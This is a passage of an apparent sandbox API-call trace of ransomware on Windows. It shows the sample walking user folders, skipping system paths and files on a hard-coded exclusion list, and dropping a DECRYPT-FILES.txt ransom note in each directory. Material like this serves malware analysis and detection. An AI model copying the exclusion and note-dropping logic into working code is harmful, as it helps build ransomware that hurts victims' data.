[0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\IETldCache\\") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Local Settings\\") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\AppData\\Local") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="AhnLab") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0088.008] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 94 [0088.008] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.008] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\jkbimi8.tmp") returned 106 [0088.008] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0088.010] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 94 [0088.010] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.010] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt") returned 112 [0088.010] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0088.010] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0088.011] CloseHandle (hObject=0x454) returned 1 [0088.011] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 94 [0088.011] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0088.011] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0088.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.012] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.012] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.012] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.012] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.012] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0088.012] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0088.012] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0088.012] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0088.012] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0088.012] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0088.012] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="autorun.inf") returned 1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot.ini") returned 1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="desktop.ini") returned 1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="iconcache.db") returned 1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootsect.bak") returned 1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat.log") returned -1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="thumbs.db") returned -1 [0088.012] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0088.012] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0088.012] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0088.012] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0088.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0088.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0088.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0088.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0088.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0088.013] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0088.013] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0088.013] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0088.013] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0088.013] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0088.013] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.013] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0088.013] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0088.013] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0088.013] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0088.013] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 94 [0088.013] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.013] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0088.013] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\jkbimi8.tmp" [0088.013] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.013] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.013] CloseHandle (hObject=0x0) returned 0 [0088.013] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.014] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="autorun.inf") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot.ini") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="desktop.ini") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="iconcache.db") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootsect.bak") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat.log") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="thumbs.db") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0088.014] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0088.014] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0088.014] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="autorun.inf") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="boot.ini") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="desktop.ini") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="iconcache.db") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="bootsect.bak") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat.log") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="thumbs.db") returned 1 [0088.014] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Bootfont.bin") returned 1 [0088.014] lstrlenW (lpString="Windows Media Player.lnk") returned 24 [0088.014] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0088.014] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0088.014] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0088.014] CloseHandle (hObject=0x450) returned 1 [0088.014] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar\\", cAlternateFileName="")) returned 0 [0088.015] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.015] CloseHandle (hObject=0x448) returned 1 [0088.015] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de6f76b, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0088.015] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0088.015] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.015] CloseHandle (hObject=0x440) returned 1 [0088.015] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch\\", cAlternateFileName="QUICKL~1")) returned 0 [0088.015] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0088.015] CloseHandle (hObject=0x438) returned 1 [0088.015] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0088.015] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\" [0088.015] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\jkbimi8.tmp" [0088.015] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.016] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.016] CloseHandle (hObject=0x0) returned 0 [0088.016] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.016] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0088.016] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0088.016] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0088.016] lstrcatW (in: lpString1="Protect", lpString2="\\" | out: lpString1="Protect\\") returned="Protect\\" [0088.016] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Protect\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" [0088.016] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Program Files") returned 0x0 [0088.016] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch=":\\Windows") returned 0x0 [0088.016] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Games\\") returned 0x0 [0088.016] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Tor Browser\\") returned 0x0 [0088.016] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\ProgramData\\") returned 0x0 [0088.016] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0088.016] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0088.017] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0088.017] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\All Users") returned 0x0 [0088.017] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\IETldCache\\") returned 0x0 [0088.017] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Local Settings\\") returned 0x0 [0088.017] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\AppData\\Local") returned 0x0 [0088.017] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="AhnLab") returned 0x0 [0088.017] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0088.017] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned 51 [0088.017] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.017] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\jkbimi8.tmp") returned 63 [0088.017] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0088.017] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned 51 [0088.017] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.017] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt") returned 69 [0088.017] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0088.019] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0088.020] CloseHandle (hObject=0x43c) returned 1 [0088.020] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned 51 [0088.020] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*" [0088.020] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a8d820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a8d820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0088.020] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.020] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a8d820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a8d820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.020] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.020] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.020] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", 